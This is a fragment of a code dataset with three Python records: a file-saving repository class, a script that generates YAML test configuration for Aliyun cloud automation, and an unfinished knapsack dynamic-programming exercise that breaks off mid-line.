self.__stats[el] + \"\\n\")\n f = open(str(self.version) + \"Heal.file\", \"wb\")\n f.write(text.encode(\"utf-8\"))\n f.close()\n # f = open(\"configuration.ini\", \"r\")\n # text = f.readline().split(\" \")\n # f.close()\n # text[3] = str(self.version)\n # f = open(\"configuration.ini\", \"w\")\n # f.write(text[0]+\" \"+text[1]+\" \"+text[2]+\" \"+str(text[3]))\n # f.close()\n\n def config(self, bg, fg, pic):\n \"\"\"saves the new app configuration style in a file\"\"\"\n f = open(\"configuration.ini\", \"w\")\n f.write(bg+\" \"+fg+\" \"+pic+\" \"+str(self.version))\n f.close()\n","sub_path":"repository/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"67682154","text":"import os\nimport sys\nimport yaml\nimport logging\nfrom optparse import OptionParser\n\nREALPATH = os.path.split(os.path.realpath(__file__))[0]\nROOT_PATH = os.path.dirname(REALPATH)\n\nconfig_yaml = \"%s/config.yaml\" % ROOT_PATH\npassword_yaml = \"%s/cfg/password.yaml\" % ROOT_PATH\ncommon_yaml = \"%s/cfg/common.yaml\" % ROOT_PATH\npolarion_yaml = \"%s/cfg/polarion_config.yaml\" % ROOT_PATH\n\nAliyunSub = \"\"\"\\\n aliyun_access_key_id: %(aliyun_access_key_id)s\n aliyun_access_key_secret: %(aliyun_access_key_secret)s\\\n\"\"\"\n\nCommonYaml = \"\"\"\\\nCommon:\n Distro: %(distro)s\n Project: %(project)s\nCloudSub:\n%(cloud_sub)s\nRedhatSub:\n username: %(redhat_username)s\n password: %(redhat_password)s\nVMUser:\n username: %(vm_username)s\n password: %(vm_password)s\n keypairname: %(keypairname)s\nRegion:\n id: %(region_id)s\nZone:\n id: %(zone_id)s\nOSDisk:\n name: %(osdisk_name)s\n local_path: %(osdisk_local_path)s\nVM:\n name: %(vm_name_prefix)s\n instance_type: %(vm_size)s\nImage:\n name: %(image_name)s\n id: %(image_id)s\nNetwork:\n VPC:\n name: %(vpc_name)s\n id: %(vpc_id)s\n cidr: 172.17.0.0/16\n VSwitch:\n name: %(vswitch_name)s\n id: %(vswitch_id)s\n cidr: 172.17.224.0/20\nSecurityGroup:\n name: %(security_group_name)s\n id: %(security_group_id)s\nDataDisk:\n disk_number: 3\n disk1:\n size: 50\n host_caching: None\n disk2:\n size: 1023\n host_caching: ReadOnly\n disk3:\n size: 1023\n host_caching: ReadWrite\n\"\"\"\n\nTestYaml = \"\"\"\\\ntest:\n !include : common.yaml\n !include : instance_types_%(region)s.yaml\n !include : cases_%(case_group)s.yaml\n\"\"\"\n\nPolarionYaml = \"\"\"\\\nPROJECT: %(project)s\nRHEL_VERSION: %(rhel_version)s\nTYPE: %(case_group)s\nRESULT_PATH: %(result_path)s\nTAG: %(tag)s\n\"\"\"\n\n\ndef _write_file_content(filename, content):\n with open(filename, 'w') as f:\n f.write(content)\n\n\nclass Distro(object):\n def __init__(self):\n \"\"\"\n The distro structure\n \"\"\"\n self.size = None\n self.sub = None\n self.params = None\n\n\nclass CreateConfFiles(object):\n def __init__(self, data, account_data):\n \"\"\"\n :param data: Parameters dictionary. Parse the config.yaml\n :param account_data: Account parameters dictionary. Parse the password.yaml\n \"\"\"\n self.data = data\n self.account_data = account_data\n self.distro = data.get(\"distro\")\n self.rhel_version = None\n\n def create_common_yaml(self):\n \"\"\"\n Create common.yaml\n \"\"\"\n # Set distro specified parameters\n cloud = Distro()\n if self.distro == \"aliyun\":\n cloud.size = \"ecs.sn1.medium\"\n aliyun_sub_params = {\n \"aliyun_access_key_id\": self.account_data.get(\"AliyunSub\").get(\"aliyun_access_key_id\"),\n \"aliyun_access_key_secret\": self.account_data.get(\"AliyunSub\").get(\"aliyun_access_key_secret\")\n }\n cloud.sub = AliyunSub % aliyun_sub_params\n cloud.params = {\"keypairname\": \"wshi\",\n \"vm_username\": \"root\",\n \"vm_name_prefix\": \"aliauto\"}\n else:\n logging.error(\"No such distro: {0}\".format(self.distro))\n sys.exit(1)\n # Set common param dict\n common_yaml_dict = {\n \"distro\": self.distro,\n \"project\": self.data.get(\"project\"),\n \"cloud_sub\": cloud.sub,\n \"redhat_username\": self.account_data.get(\"RedhatSub\").get(\"username\"),\n \"redhat_password\": self.account_data.get(\"RedhatSub\").get(\"password\"),\n \"vm_username\": self.account_data.get(\"VMUser\").get(\"username\", \"\"),\n \"vm_password\": self.account_data.get(\"VMUser\").get(\"password\", \"\"),\n \"region_id\": self.data.get(\"Region\").get(\"id\"),\n \"zone_id\": self.data.get(\"Zone\").get(\"id\"),\n \"osdisk_name\": self.data.get(\"OSDisk\", {}).get(\"name\", \"\"),\n \"osdisk_local_path\": self.data.get(\"OSDisk\", {}).get(\"local_path\", \"/home/autotest/osdisk/{0}\".format(self.distro)),\n \"vm_size\": cloud.size,\n \"image_name\": self.data.get(\"Image\").get(\"name\", \"\"),\n \"image_id\": self.data.get(\"Image\").get(\"id\", \"\"),\n \"vpc_name\": self.data.get(\"VPC\").get(\"name\", \"\"),\n \"vpc_id\": self.data.get(\"VPC\").get(\"id\", \"\"),\n \"vswitch_name\": self.data.get(\"VSwitch\").get(\"name\", \"\"),\n \"vswitch_id\": self.data.get(\"VSwitch\").get(\"id\", \"\"),\n \"security_group_name\": self.data.get(\"SecurityGroup\").get(\"name\", \"\"),\n \"security_group_id\": self.data.get(\"SecurityGroup\").get(\"id\", \"\")\n }\n # Merge cloud.params into common param dict\n common_yaml_dict.update(cloud.params)\n # Wrote to file\n _write_file_content(common_yaml,\n CommonYaml % common_yaml_dict)\n return 0\n\n def create_test_yaml(self):\n \"\"\"\n Create test_asm.yaml or test_arm.yaml\n \"\"\"\n test_yaml = \"{0}/cfg/test.yaml\".format(ROOT_PATH)\n test_yaml_dict = {\n \"case_group\": self.data.get(\"case_group\", \"function\"),\n \"region\": self.data.get(\"Region\").get(\"id\", \"us-west-1\").replace('-', '')\n }\n _write_file_content(test_yaml,\n TestYaml % test_yaml_dict)\n return 0\n\n def create_polarion_config_yaml(self):\n \"\"\"\n Create polarion_config.yaml\n \"\"\"\n polarion_yaml_dict = {\n \"project\": self.data.get(\"project\"),\n \"rhel_version\": self.data.get(\"rhel_version\"),\n \"case_group\": self.data.get(\"case_group\"),\n \"result_path\": \"{0}run-results/{1}/latest\".format(self.data.get(\"store_dir\", \"/home/autotest/\"), self.distro),\n \"tag\": self.data.get(\"tag\")\n }\n _write_file_content(polarion_yaml,\n PolarionYaml % polarion_yaml_dict)\n return 0\n\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [-o ]\"\n parser = OptionParser(usage)\n# parser.add_option('-t', '--type', dest='type', action='store',\n# help='The type of the test. Default value is onpremise. '\n# '(onpremise/ondemand/customize)', metavar='TYPE')\n# parser.add_option('-o', '--osdisk', dest='osdisk', action='store',\n# help='The VHD OS disk name(e.g.RHEL-7.3-20161019.0-wala-2.2.0-2.vhd)', metavar='OSDISK.vhd')\n parser.add_option('-p', '--provision-only', dest='provision_only', default=False, action='store_true',\n help='Only run provision. Do not run test cases.')\n parser.add_option('-r', '--run-only', dest='run_only', default=False, action='store_true',\n help='Only run test cases. Do not provision.')\n parser.add_option('-i', '--import-only', dest='import_only', default=False, action='store_true',\n help='Only import the latest result to polarion. Do not run tests.')\n\n options, args = parser.parse_args()\n\n with open(config_yaml, 'r') as f:\n data = yaml.load(f)\n with open(password_yaml, 'r') as f:\n account_data = yaml.load(f)\n# type = options.type\n# if not type:\n# type = data.get(\"type\", None)\n# if not type:\n# parser.print_help()\n# parser.error(\"The type must be specified.\")\n createFile = CreateConfFiles(data, account_data)\n ret = 0\n if options.provision_only:\n pass\n elif options.run_only:\n ret += createFile.create_common_yaml()\n ret += createFile.create_test_yaml()\n elif options.import_only:\n ret += createFile.create_polarion_config_yaml()\n else:\n ret += createFile.create_common_yaml()\n ret += createFile.create_test_yaml()\n ret += createFile.create_polarion_config_yaml()\n sys.exit(ret)\n","sub_path":"tools/create_conf.py","file_name":"create_conf.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"238171102","text":"#아직 푸는 중...미완성\n\nn,k = map(int, input().split())\n\nobject = []\nfor i in range(0,n):\n w,v=map(int,input().split())\n object.append((w,v))\ndp = [[0]*(k+1) for _ in range(n+1)]\n\n\n'''\nfor i in range(0,n):\n if (dp[i][1]+object[i][0])<=k:\n a=int(dp[0]+object[i][0])\n b=int(dp[1]+object[i][1])\n dp.append((a,b))\n maximum=max(dp[i][1],dp[i-1][1])\n\n\nprint(maximum)\n'''\nfor i in range(1,n+1):\n for j in range(1,k+1):\n w=object[i][0]\n v=object[i][1]\n if j